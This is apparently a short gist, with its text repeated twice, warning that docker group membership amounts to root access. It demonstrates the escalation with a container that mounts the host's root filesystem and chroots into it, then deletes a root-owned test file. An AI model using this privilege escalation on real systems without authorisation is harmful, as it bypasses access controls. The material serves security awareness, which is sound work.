nileshsimaria/User belongs to docker group

## User belongs to docker group
Be careful if you are adding user to docker group.

1. As a root, create a file (owner root and group root)

$ touch /etc/foo
$ ls -l /etc/foo
-rw-r--r-- 1 root root 0 Dec  5 17:40 /etc/foo

2. Login as a non-root user belongs to docker group. In my example its user u1.
$ id
uid=1002(u1) gid=1002(u1) groups=1002(u1),999(docker)

3. Since the user belongs to docker group, it has access of all of the docker commands like
docker run, docker ps, etc.

That user can spin up a new container which can mount "/" and then chroot to it as shown below.
$ docker run -ti  -v /:/host fedora chroot /host

4. Now the user u1 (non-root) has access of root, so u1 can delete the file from within container we created earlier as root.
$ rm /etc/foo (This is from inside the fedora container)

5. From the root, verify the file is actually gone (deleted by user u1)
$ ls -l /etc/foo
ls: cannot access '/etc/foo': No such file or directory
	Be careful if you are adding user to docker group.

	1. As a root, create a file (owner root and group root)

	$ touch /etc/foo
	$ ls -l /etc/foo
	-rw-r--r-- 1 root root 0 Dec 5 17:40 /etc/foo

	2. Login as a non-root user belongs to docker group. In my example its user u1.
	$ id
	uid=1002(u1) gid=1002(u1) groups=1002(u1),999(docker)

	3. Since the user belongs to docker group, it has access of all of the docker commands like
	docker run, docker ps, etc.

	That user can spin up a new container which can mount "/" and then chroot to it as shown below.
	$ docker run -ti -v /:/host fedora chroot /host

	4. Now the user u1 (non-root) has access of root, so u1 can delete the file from within container we created earlier as root.
	$ rm /etc/foo (This is from inside the fedora container)

	5. From the root, verify the file is actually gone (deleted by user u1)
	$ ls -l /etc/foo
	ls: cannot access '/etc/foo': No such file or directory